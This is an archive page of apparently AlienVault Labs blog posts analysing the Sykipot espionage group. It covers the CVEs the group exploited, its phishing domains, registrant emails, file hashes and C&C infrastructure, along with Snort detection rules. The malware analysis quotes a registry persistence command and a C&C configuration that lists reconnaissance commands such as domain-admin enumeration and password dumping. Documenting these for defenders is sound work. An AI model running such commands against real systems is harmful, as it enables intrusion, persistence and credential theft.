AlienVault Labs - Tag Archive

New Sykipot developments

Summary

During the last few years, we have been publishing about a group of hackers who have focused on targeting DIB (Defence Industrial Base) and other government organizations:

- Another Sykipot sample likely targeting US federal agencies

- Are the Sykipot’s authors obsessed with next generation US drones?

- Sykipot variant hijacks DOD and Windows smart cards

- Sykipot is back

Sykipot are a highly skilled group of individuals who have exploited a wide range of zeroday vulnerabilities in the last few years including:

CVE	Date	Product
CVE-2007-0671	2007-02-02	Microsoft Excel
CVE-2009-3957	2010-12-01	Adobe Reader
CVE-2010-0806	2010-05-04	Internet Explorer
CVE-2010-2883	2010-09-08	Adobe Reader
CVE-2010-3654	2010-10-28	Adobe Flash Player
CVE-2011-2462	2011-12-06	Adobe Reader

In this blog post we will unveil the new vulnerabilities that this group have used using during the last 8 months and we will publish the new infrastructure they have used. We will expose several examples of the campaigns they have launched and new versions of the Sykipot backdoor they have used to access the compromised systems. We have found evidences that show they have exploited at least the following vulnerabilities during the last few months:

CVE	Date	Product
CVE-2012-1889	06/13/2012	MSXML/Internet Explorer
CVE-2012-1723	06/12/2012	Java 7
CVE-2012-4969	09/16/2012	Microsoft Internet Explorer
CVE-2013-0640	02/12/2012	Adobe Acrobat Reader

Several times the date of the exploit was a few days after the vulnerability had been disclosed and there wasn’t a patch released by the vendor.

Campaigns

In the past most of the campaigns which we found related to the Sykipot actors were based on SpearPhishing mails with attachments that exploited vulnerabilities in software like Microsoft Office, Adobe Flash, Adobe PDF and some times Internet Explorer. During the last 8-10 months we have seen a change and the number of SpearPhishing campaigns which have included a link instead of an attachment and this has increased. Once the victim clicks in the link the attackers will use vulnerabilities in Internet Explorer, Java, etc to access the system.

Some examples of the campaigns they have launched are detailed below.

gsasmartpay.org – 2012-06-20

The last summer, we found a malicious site that the Sykipot actors set up to try and phish government employees. When the victim visited the link the following page appeared:

As we can see it shows the information present in https://smartpay.gsa.gov/cardholders.

“The GSA SmartPay program, established in 1998, is the largest charge card program in the world serving more than 350 federal agencies, organizations, and Native American tribal governments. In FY10, approximately 98.9M transactions were made and $30.2B were charged using the GSA SmartPay charge cards, creating $325.9M in refunds.”

“Eligibility for the program is determined by the GSA SmartPay Contracting Officer. Federal agencies, departments, tribal organizations, and approved non-federal entities can apply to obtain charge card services under the GSA SmartPay program.”

If we take a look at the malicious files we will find that it was exploiting CVE-2012-1889 in the background:

During the exploitation it will load the following files as well:

www[.]gsasmartpay[.]org/cardholders/login/movie[.]swf?apple=AA969692D8CDCD959595CC859183918F83909692839BCC8D9085CD83868D808784CC919584E2E2E2E2
www[.]gsasmartpay[.]org/cardholders/login/deployJava[.]js
www[.]gsasmartpay[.]org/cardholders/login/faq[.]htm

We are not going to show how this vulnerability is exploited since we have showed it in previous blog posts, you can find a good description here.

searching-job.net is another domain registered by the Sykipot actors (registered by thomas7610@yahoo.com on 06-20-2012) that was also serving the same exploit at that time:

www[.]searching-job[.]net/list/verification/deployJava[.]js
www[.]searching-job[.]net/list/verification/faq[.]htm
www[.]searching-job[.]net/list/verification/index[.]htm
www[.]searching-job[.]net/list/verification/movie[.]swf?apple=AA969692D8CDCD959595CC91878390818A8B8C85CF888D80CC8C8796CD848B8E878E8B9196CC868396E2E2E2E2
www[.]searching-job[.]net/account_list/verification/index[.]htm

Apart from gsasmartpay.org we have found several domains registered by the Sykipot actors that they have probably used to phish users in the last few months. Some of the most suspicious ones are detailed below:

- dfasonline.com registered by alcott.churchill@yahoo.com on 06-19-2012

Probably related to Defense Finance and Accounting Service – DFAS - http://www.dfas.mil/

- aafbonus.com registered by janagreen2000@yahoo.com on 06-19-2012

Probably related to American Advertising Federation – http://www.aaf.org/

- nceba.org registered by jimgreen200088@yahoo.com on 07-24-2012

Probably related to U.S. BANKRUPTCY ADMINISTRATOR - http://www.nceba.uscourts.gov/

- pdi2012.org registered by alcott.churchill@yahoo.com on 08-18-2011

Probably related to PDI 2012, the premier training event hosted by the American Society of Military Comptrollers

- hudsoninst.com registered by alcott.churchill@yahoo.com on 11-26-2012

Probably related to the Hudson Institute – http://www.hudson.org/

Hudson Institute is a nonpartisan, independent policy research organization dedicated to innovative research and analysis that promotes global security, prosperity, and freedom.

CVE-2012-4969 – Internet Explorer

In September last year, the Sykipot actors registered several domains to exploit a vulnerability in Internet Explorer (CVE-2012-4969).

- resume4jobs.net registered by james.wade1@yahoo.com on 03-08-2012

URL’s involved:

http://www[.]resume4jobs[.]net/account/1024486[.]html

http://www[.]resume4jobs[.]net/account/embed[.]htm

http://www[.]resume4jobs[.]net/jobs[.]exe Sykipot malware that uses info[.]resume4jobs[.]net as the C&C

- paypal1.dns1.us – Dynamic DNS provider

URL’s involved:

http://paypal1[.]dns1[.]us/account/1024486[.]html

http://paypal1[.]dns1[.]us/account/embed[.]htm

- pollingvoter.org registered by jimgreen200088@yahoo.com on 06-11-2012

URL’s involved:

http://www[.]pollingvoter[.]org/ne2012/vote/embed[.]htm

http://www[.]pollingvoter[.]org/life[.]exe Sykipot malware that uses www[.]betterslife[.]com as the C&C

- skyruss.net registered by joneluxara@yahoo.com on 04-17-2012

URL’s involved:

http://social[.]sns[.]skyruss[.]net/variety/index[.]html

http://forum[.]skyruss[.]net/articles/embed[.]htm

CVE-2012-1723 – Java 7

In August, they were exploiting a vulnerability in Java (CVE-2012-1723) to gain access to the victim’s systems. It seems they were using the Metasploit version of the exploit.

Some examples are:

- slashdoc.org registered by jessantt@gmail.com on 05-21-2012

URL’s involved:

http://www[.]slashdoc[.]org/default[.]jar

http://www[.]slashdoc[.]org/index[.]html

The index.html page loads the malicious Java applet and it passes the payload they want to execute using the data parameter (the value is hex encoded):

In this case the host www[.]photosmagnum[.]com was used as the C&C server.

- nceba.org registered by jimgreen200088@yahoo.com on 07-24-2012

URL’s involved:

http://www[.]nceba[.]org/newsroom/article/news201207240251[.]html

http://www[.]nceba[.]org/newsroom/article/default[.]jar

Using www[.]betterslife[.]com as the C&C server.

- milstars.org registered by slyan8024@gmail.com on 06-20-2012

URL’s involved:

http://milstars[.]org/view/default[.]jar

CVE-2013-0640 – PDF Exploit targeting Japanese victims

We found the Sykipot actors using the latest Adobe Acrobat exploit (CVE-2013-0640) a few weeks ago.

The version of the exploit is the same that we found in our latest blog post:

- Latest Adobe PDF exploit used to target Uyghur and Tibetan activists

The Javascript code inside the PDF file is very similar to the one found in the Itaduke samples but part of the initial variables and the obfuscation has been removed from the original one.

Once the PDF is opened the following lure file is displayed to the victim:

Based on the content of the lure document the potential victims seem to be somehow related to the Japanese Ministry of Health, Labour and Welfare

Once the infection takes place the following fiels are created on the system:

\DOCUME~1\ADMINI~1\LOCALS~1\Temp\pfilede.dat 5ED3A94354F27BC7AF0FEF04F89D8EB8
\DOCUME~1\ADMINI~1\LOCALS~1\mpr.dll 84EFAFF343CF7A34D2A0D847A1E5FD50
\DOCUME~1\ADMINI~1\LOCALS~1\setm.ini 00051F392350128BA4DD4CA10F44DDEF
\DOCUME~1\ADMINI~1\LOCALS~1\temp.dll BEA84BE4BFE236652F6A4E382B21A96F

The file setm.ini contains the configuration of Sykipot in this case:

[srv_info]
sleeptime=3600000
url=bassball[.]peocity[.]com (C&C server)
scexe=rsvp.exe
scdll=mpr.dll
runexe=run.exe
mark=0304adbh

The following actions take place in the system:

cmd /c reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v start /t REG_SZ /d [sykipot_payload_file].exe -startup /f (persistence)

Several functions are called within the Sykipot’s DLL:

[sykipot_payload_file].exe -startupEx
[sykipot_payload_file].exe -startup1
cmd /c [sykipot_payload_file].exe -startup

Then the malicious payload will be injected into Internet Explorer.

The malware will communicate with the C&C server once in a while using SSL and the well known communication paths of previous Sykipot payloads:

/kys_allow_put.asp?type=
/kys_allow_get.asp?name=

As we showed in the past most of the Sykipot samples used the key “19990817″ for encryption.In this sample we have found a new key “20120709″ that is also a date.

Infrastructure

Along with the blog post we are making a list of new domains public that weren’t mentioned in previous Sykipot research:

Unique malicious domains:

peocity.com
rusview.net
skyruss.net
commanal.net
natareport.com
photogellrey.com
photogalaxyzone.com
insdet.com
creditrept.com
pollingvoter.org
dfasonline.com
hudsoninst.com
wsurveymaster.com
nhrasurvey.org
pdi2012.org
nceba.org
linkedin-blog.com
aafbonus.com
milstars.org
vatdex.com
insightpublicaffairs.org
applesea.net
appledmg.net
appleintouch.net
seyuieyahooapis.com
appledns.net
emailserverctr.com
dailynewsjustin.com
hi-tecsolutions.org
slashdoc.org
photosmagnum.com
resume4jobs.net
searching-job.net
servagency.com
gsasmartpay.org
tech-att.com

We are releasing Snort rules to detect queries to the malicious domains in your network:

Thanks to EmergingThreats for the help. You will find the rules in its ruleset update today as well.

Based in our research, below is the list of unique e-mail addreses used to registered malicious domains:

233@lao.com
Joneluxara@yahoo.com
alcott.churchill@yahoo.com
b@bvc.com
calvin.kliff@yahoo.com
carrier.fisher@hotmail.com
conan0557@126.com
james.wade1@yahoo.com
janagreen2000@yahoo.com
jessantt@gmail.com
jimgreen200088@yahoo.com
jimgreen20008@yahoo.com
marialreyna11211919@yahoo.com
morgan.wale1@yahoo.com
mskinner62@yahoo.com
myhog@hotmail.com
parviz7415@yahoo.com
slyan8024@gmail.com
thomas7610@yahoo.com

Apart from the list of new domains you should check out the domains mentioned in the following articles that all related to previous Sykipot’s activity but some of them are still being used in Sykipot’s operations:

- Sykipot is back - Alienvault Labs

- The Sykipot Attacks - Symantec

- The Sykipot Campaign – TrendMicro

- Hurricane Sandy serves as lure to deliver Sykipot - Verizon

- Insight into Sykipot Operations - Symantec

- Medical Industry A CYBER VICTIM: BILLIONS STOLEN AND LIVES AT RISK - Cyber Squared

jaime.blasco

At AlienVault Jaime manages the Lab and runs the Vulnerability Research Team. Prior to working in the AlienVault lab he founded a couple of startups (Eazel, Aitsec) working on web application security, source code analysis and incident response. His background stems from a number of years working in vulnerability management, malware analysis and security researching.

More Posts - Website

Follow Me:

CVE-2012-1723, CVE-2012-1889, CVE-2012-4969, CVE-2013-0640, Sykipot

Sykipot is back

It has been a while since we published information about Sykipot. The last time we blogged about it, we discovered a variant that was able to bypass two-factor authentication to access protected resources on the victim’s network.

We have detected a new wave of Sykipot campaigns that has been running during the past weeks. There are several changes between the new Sykipot campaigns and the older ones.

The first difference is that in previous campaigns the Sykipot authors mainly used file-format exploits to gain access to the systems through spearphishing mails. This is the list of file-format exploits used in the past:

CVE	Date	Product
CVE-2007-0671	2007-02-02	Microsoft Excel
CVE-2009-3957	2010-12-01	Adobe Reader
CVE-2010-0806	2010-05-04	Internet Explorer
CVE-2010-2883	2010-09-08	Adobe Reader
CVE-2010-3654	2010-10-28	Adobe Flash Player
CVE-2011-2462	2011-12-06	Adobe Reader

This time it seems they are mainly using drive-by-download exploits like CVE-2011-0611 affecting Flash Player or the new Windows XML Core zero-day vulnerability.

The CVE-2012-1889 vulnerability is related to Google’s warnings on state-sponsored attacks .

Instead of attaching malicious files on e-mails, they send e-mails to the victims with a malicious link. Once the victim clicks on the link the malicious server tries to exploit a vulnerability on the user’s browser.

The modus operandi of the group behind these attacks seems to be the same as in the past. The attackers hack US based servers and then install software to serve the malicious content or to redirect the connections to a remote server.

The malware continues using SSL to communicate with the C&C server. Once executed, the malware tries to get a configuration file from a remote server. On the older versions they used an underlying encryption using the XOR key “19990817″ for the config files. The XOR obfuscation has been removed and in the new versions a simple byte subtraction routine is used.

The configuration file is requested from a remote server using the following URL format:

GET /get.asp?nm=index.dat&hnm=[HOSTNAME]-[IP-ADDRESS]-[IDENTIFIER] (SSL based)

They continue to use the hardcoded referer of ‘www.yahoo.com’ on the requests.

The new configuration format supports several commands and most of the previous names have changed. This is the list of supported instructions:

- porth – List of active connections (netstat-like)

- processh – List of processes running on the system

- tasklisth – List of processess (tasklist.exe-like)

- serviceslisth – List of running services and their status (running/stopped)

- starth – Starts a service

- stoph – Stops a service

- delh – Deletes a file

- gh – Gets a file from the C&C server

- ph – Uploads a file to the C&C server

- dir/h – Lists a directory/file

- dir/sh - Lists a directory/file

- runh -

- EXITH – Deletes the malware from the system

- info – Executes a command (Winexec)

- without param – Gets network info and startup time

- sleeph – Sleeps a number of seconds

Once the malware downloads the config file it executes every instructions, it saves the result and obfuscates the data using the subtraction routine. Finally it sends the result to the C&C server.

Some of the known Sykipot domains that are being used to serve malicious content or as C&C domains are:

- newcarstyle.com

- nhrasurvey.org

- quicksurveypro.com

- contractspt.com

- betterslife.com

- aeroconf13.org

- e-landusa.net

- photosmagnum.com

- reythy.com

Most of the domains have been registered during the last month and they have used the mail address jimgreen200088 [at] yahoo.com to register most of them.

The Netbox webserver used in previous campaigns is also present in most of the C&C servers .

Note the domain aeroconf13.org seems to be related with a spearphishing campaign against potential attendees of the IEEE Aerospace Conference (the International Conference for Aerospace Experts, Academics, Military Personnel, and Industry Leaders).

We will continue to offer more information on these new campaigns as long as we find more details. Stay tune for more information and apply your patches!.

jaime.blasco

More Posts - Website

Follow Me:

CVE-2012-1889, IEEE Aerospace Conference, Sykipot

Are the Sykipot’s authors obsessed with next generation US drones?

December 20th, 2011 | Posted by jaime.blasco in Attacks | Malware | News | Snort - (6 Comments)

For several weeks there has been a great deal of talk about the “undeclared global cyber war”. There have been accusations that China is stealing almost anything they choose and that they have a “shopping list” that gives priority to key industries like:

Clean energy industry
Biotechnology
Semiconductors
Information technology
Aerospace technology
Medical technology

This month, Lockheed Martin raised the alarm on an Adobe Reader zero-day exploit that was being exploited in the wild. Once again the payload dropped was Sykipot, a known malware that has appeared several times in combination with zero-day exploits and has been used to launch targeted attacks since 2007. The list of known zero-day exploits used by Sykipot’s authors during these years is as following:

CVE	Date	Product
CVE-2007-0671	2007-02-02	Microsoft Excel
CVE-2009-3957	2010-12-01	Adobe Reader
CVE-2010-0806	2010-05-04	Internet Explorer
CVE-2010-2883	2010-09-08	Adobe Reader
CVE-2010-3654	2010-10-28	Adobe Flash Player
CVE-2011-2462	2011-12-06	Adobe Reader

The “drone” campaign

There have been a lot of different campaigns with different Command-And-Control servers. The modus operandi is simple, they send emails with a malicious attachment or link, sometimes using a zero-day exploit to key employees of different organizations.

In most of the campaigns the malware dropped displays some document or media attractive to the victim. After analyzing most of the campaigns, we discovered a group of samples connecting to the same C&C server that attracted our attention because of the media displayed after the infection:

As you can see, all the content is related with US UCAVs (unmanned combat air vehicle):

We can imagine that this campaign could target organizations related to technology used in this kind of vehicles like aerospace and military industries.

Some of the mails used contain attachments with names like:

X-37B Orbital Test Vehicle.scr
X-45b.scr

With the information we collected it appears that this campaign has been running for months. The domain used for the C&C server was registered on 2011-03-04 and we detected two different campaigns with timestamps on 09/08/2011 and 09/26/2011.

Here is the list of analyzed samples:

MD5	Creation Date	Campaign String
d978d8071c19a4aca13b4180d250f4db	09/08/2011 13:16:19	-help20110908
425c0856e5aec8bdf91ac0cf5aec2805	04/19/2011 12:55:24 09/08/2011 13:16:19	-help20110908
cb0ceb37e2eb11ea4ee5090a09fd8b4d	09/26/2011 09:16:19	-help20110926
6f8601931c450e1f79ae560f4de98665	04/19/2011 12:55:24 09/26/2011 09:16:40	-help20110926
23309fbec1b3a063415c00fbeb50ee66	04/19/2011 12:55:24 09/26/2011 09:16:40	-help20110926
e36a8ff79bc641530071da6c8b8f15d7	04/19/2011 12:55:24 09/26/2011 09:16:40	-help20110926
45b8cb1b9aa3c22ff10a2a00deed82a6	04/19/2011 12:55:24 09/08/2011 13:16:19	-help20110908
bf61f5d008c385b63429127849998745	04/19/2011 12:55:24 09/08/2011 13:16:19	-help20110908
248def2faa654efb0fb4c4d594757957	04/19/2011 12:55:24 09/08/2011 13:16:19	-help20110908
08883b00a3969db54bbfb7bb1a20b531	09/08/2011 13:16:05	-help20110908
5144c11008eae61f7c654794b00b119d	04/19/2011 12:55:24 09/08/2011 13:16:19	-help20110908

As we have discussed previously, the trojan injects itself into Internet Explorer, Firefox or Outlook process memory and then connects to the C&C server, retrieving an encrypted configuration file with commands to execute on the victim’s system and then sends the results back to the C&C server. In this case the config file is as follow:

C:\DOCUME~1\user\CONFIG~1\gthelp.tmp,0
iexplore
findpass2000
process
ipconfig /all
net start
net view /domain
net group "domain admins" /domain
tasklist /v
net localgroup administrators
dir c:\*.url /s
systeminfo
type c:\boot.ini

Apart from this, the C&C mechanism permits the following actions:

cmd
shell
run
getfile
putfile
kill
process
reboot
time
door

Tracing C&C servers

After an analysis of the different domains used this year by Sykipot and the C&C headers and data, we discovered that they were using hacked servers mainly in the US to mask the real C&C server.

It appears that they used well known public exploits to hack into US based servers and then install a software to proxy the connections between the infected systems and the real C&C server.

We realized that most of the C&C servers were running a webserver called “Netbox” (http://www.netbox.cn) and most of them were using a self-signed certificate with the following subject:

/C=US/ST=North Carolina/L=Salisbury/O=Internet Widgits Pty Ltd/OU=VeriSign Trust Network/CN=ITU Server/emailAddress=<a href="mailto:marry.smith@ltu.edu">marry.smith@ltu.edu</a>

After a short investigation on the Netbox webserver, we learnt that it is a windows based webserver that allows developers to compile and deploy ASP web applications into a stand-alone executable file.

We also checked Shodan and discovered that there were only a couple of thousand servers running the webserver and nearly the 80% of the servers were located on China.

With this information, we thought that there was a good chance to localize these servers on Chinese network ranges. So we began to search Netbox servers running SSL on port 443 with a certificate issued to marry.smith@ltu.edu on the main Chinese ISP providers.

After some time, we confirmed our suspicion and we found 7 ip addresses belonging to “China Unicom Beijing province network” that matched our criteria.

Six of them were pointing to the same webserver (same certificate, same headers, timestamps) so it appears that they are using that machines to proxy the connections as well but we don’t know if one of them was the last C&C server.

Here is the certificate information:

Download

There was another server serving a different certificate that seems to be pointing to a different C&C server:

Download

Here is the Map with the active redirections (2011-12-17):

As we can see, the malware authors are masquerading the C&C through US servers in order to make the connections less suspicious as well as using SSL certificates that contain a mail address from Lawrence Tech University (mary.smith@ltu.edu).

They are using the default common name on the certificate. I have seen this behavior in other malware’s C&C. In order to detect a remote site serving this kind of certificates is good to run the following IDS signature:

alert tcp any 443 -&gt; any any (msg:"POLICY self-signed certificate default common name detected"; flow:established,to_client; ssl_state: server_hello; content:"|16|"; content:"|0b|"; within:8; content:"Internet Widgits Pty Ltd"; within:400; classtype:bad-unknown; sid:11111111113; rev:8;)

Apart from this rule, I think it is good to run the following rules for a while to detect the certificate serial number and other certificates that they can be serving using the mary.smith@ltu.edu mail address:

alert tcp any 443 -&gt; any any (msg:"MALWARE Sykipot certificate serial number detected"; flow:established,to_client; ssl_state: server_hello; content:"|16|"; content:"|0b|"; within:8; content:"|00 ec 32 09 67 c9 34 3f 50|"; within:30; classtype:bad-unknown; sid:11111111112; rev:8;)

alert tcp any 443 -&gt; any any (msg:"MALWARE Sykipot certificate subject emailAddress detected"; flow:established,to_client; ssl_state: server_hello; content:"|16|"; content:"|0b|"; within:8; content:"<a href="mailto:marry.smith@ltu.edu">marry.smith@ltu.edu</a>"; within:400; classtype:bad-unknown; sid:11111111113; rev:8;)

Who is behind Sykipot

We shouldn’t jump to assumptions but whoever is behind Sykipot is massively collecting information from targeted victims that covers dozens of industries.

It’s true that the piece of malware isn’t too sophisticated, but it is related with at least six zero-day attacks that require skills and/or money. Anyway we have been seeing that “not too sophisticated malware” works, see Shady RAT for instance that targeted organizations ranging from defense contractors to accounting firms.

On the other hand, we have identified at least six Chinese ip addresses that are used to proxy or host the C&C servers. We also identified a tool that the Sykipot authors use to package and create campaigns:

In some of the samples it contains some Chinese message errors.

Apart from this, the “Netbox” (http://www.netbox.cn) webserver used in the C&C servers is mainly used by those who speak Chinese. In fact all the documentation to setup and learn the framework is only available in Mandarin.

Most of the domains used on these campaigns are registered on Xinnet, a Chinese domain registrant. Also the information of the domain owners (names, addresses, etc) are from China (not very relevant).

Finally, we related one of the tools used that redirects the traffic from the hacked servers to a tool called ZXPortMap:

http://read.pudn.com/downloads64/sourcecode/internet/proxy/225114/ZXPortMap.cpp__.htm

The origin of the tool seems to be from China, someone called LZX (lzx@qq.com) but anyone could have gotten the code, and compiled it.

The last piece of information is a string embedded in all of the Sykipot binaries: “19990817” used for another layer of encryption. It can be the date “Aug 17, 1999”. The only relevant event on that date was a 7.6 magnitude earthquake that killed around 17000 people in Turkey (http://en.wikipedia.org/wiki/1999_%C4%B0zmit_earthquake).

Someone has said that cyberwar does not exist?. Draw your own conclusions.

jaime.blasco

More Posts - Website

Follow Me:

china, CVE-2011-2462, drones, malware, Sykipot

Another Sykipot sample likely targeting US federal agencies

December 12th, 2011 | Posted by jaime.blasco in Attacks | Blog | Exploits | Malware - (Comments Off)

Last week Adobe issued an advisory on a zero-day vulnerability (CVE-2011-2462) that has been being used in targeted attacks, probably defense contractors.

The payload used is Sykipot, a know malware that has connections with several targeted attacks/0days during the past.

During the analysis of this attack, I’ve found a new sample with a fresh command and control server (C&C).

MD5: 4d979bb626e1e61cc4fc0cefefaa3ec7

VirusTotal:

Submission date:
2011-12-12 00:39:51 (UTC)

Result:
25 /43 (58.1%)

The binary drops a DLL:

FileName: WSE4EF1.TMP

MD5: 945FF23E9979A0867B7F3815BB0F9477

Timestamp: 22/11/2011

Original File Name: wship4.dll (IPv4 Helper DLL)

The original malware scans the list of running process looking for outlook, iexplore or firefox. If found it injects the DLL into the process.

After that, the binary will spawn a PDF file,

FY 2012 Per Diem Rates – Effective October 1, 2011

This file shows the continental United States “CONUS rates” for travelling expenses.

The injected DLL will contact XXXhksrv.hostdefence.net/asp/kys_allow_get.asp?name=getkys.kys to download an encrypted configuration file. This file contains several commands that the victim will execute on the sending the results back to the C&C server.

Example of configuration file:

iexplore
findpass2000
process
ipconfig /all
netstat -ano
net start
net view /domain
net group “domain admins” /domain
tasklist /v
net localgroup administrators
dir c:\*.url /s

The domain info is:

Domain Name: hostdefence.net

Registrant:

Amirhosein

Amirhosein (parviz7415@yahoo.com)

No 806 8th building YuLin City GuangXi Province

Yu Lin

Guang Xi,537500

Tel. +86.7756853792

Creation Date: 2011-11-14 15:35:24

Expiration Date: 2012-11-14 15:35:24

jaime.blasco

More Posts - Website

Follow Me:

CVE-2011-2462, malware, Sykipot

New Sykipot developments

jaime.blasco

Sykipot is back

jaime.blasco

Are the Sykipot’s authors obsessed with next generation US drones?

jaime.blasco

Another Sykipot sample likely targeting US federal agencies

jaime.blasco

Navigation

Search IP in reputation database

Labs in Your Email

Labs on twitter

Tags

Recent Discussions

People Online